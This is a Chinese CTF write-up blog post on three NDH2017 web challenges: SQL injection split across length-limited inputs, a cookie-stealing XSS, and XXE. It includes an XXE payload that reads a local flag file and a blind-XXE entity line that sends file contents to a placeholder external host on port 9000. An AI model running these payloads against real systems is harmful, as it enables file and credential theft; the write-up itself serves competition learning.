NDH2017-Web-Writeup

Category: CTF
Tag: none
Written by Venenof7 with ♥ on April 2, 2017

尴尬==假期休息就没做题,等到想做的时候队友都做完了,题不算难,就写下自己做的几个题的过程:


Divide and rule

题目很明了,serach那里有注入,然后应该是可以注到user跟pass,然后在login处登录:
测试的时候发现每个输入框有长度限制,于是可以利用拼接的方式达到注入的目的XD:

屏幕快照 2017-04-02 下午12.52.57.png

但是有一点比较恶心,就是限制长度之后...感觉只能去猜表明列名了...
这里倒比较好猜,列名即是users,字段名经过猜测之后发现是login&password:
屏幕快照 2017-04-02 下午1.16.57.png

然后md5破解进去登录拿到flag:


Purple Posse Market

职业病犯了==感觉想抓人...
一个没有丝毫过滤的xss==
xss平台或者自己vps上简单写一个获取cookie的js脚本就OK,没截图就不放了...


No Pain No Gain

一个blindXXE的题目:
一开始还以为是个啥洞,最后想想才75分,应该是个xxe没跑了。

在vps上放一个xml文件:

<!ENTITY % all "<!ENTITY % send SYSTEM 'http://xxxx:9000/?file=%file;'>">  

然后flag在/home/下...
又是没截图...

赛后发现自己做的其实麻烦了,主要是因为当时自己的xxe写法出了点小问题...当时只是在xml内定义了,在外面却忘记改了名字导致没成功><

<!DOCTYPE data [ <!ENTITY test SYSTEM "file:///home/flag/flag" > ]>
id,name,email
1,&test;,email1@mail.com

OK:
屏幕快照 2017-04-03 上午2.22.03.png


事实告诉我们,做题时候要随手截图QAQ

  •  
  •  
  • Pwnhub-小m的修仙题-WP&反思
  • PHPCMS V9.6.0注入分析
取消回复

说点什么?

© 2019 Venenof7's Blog.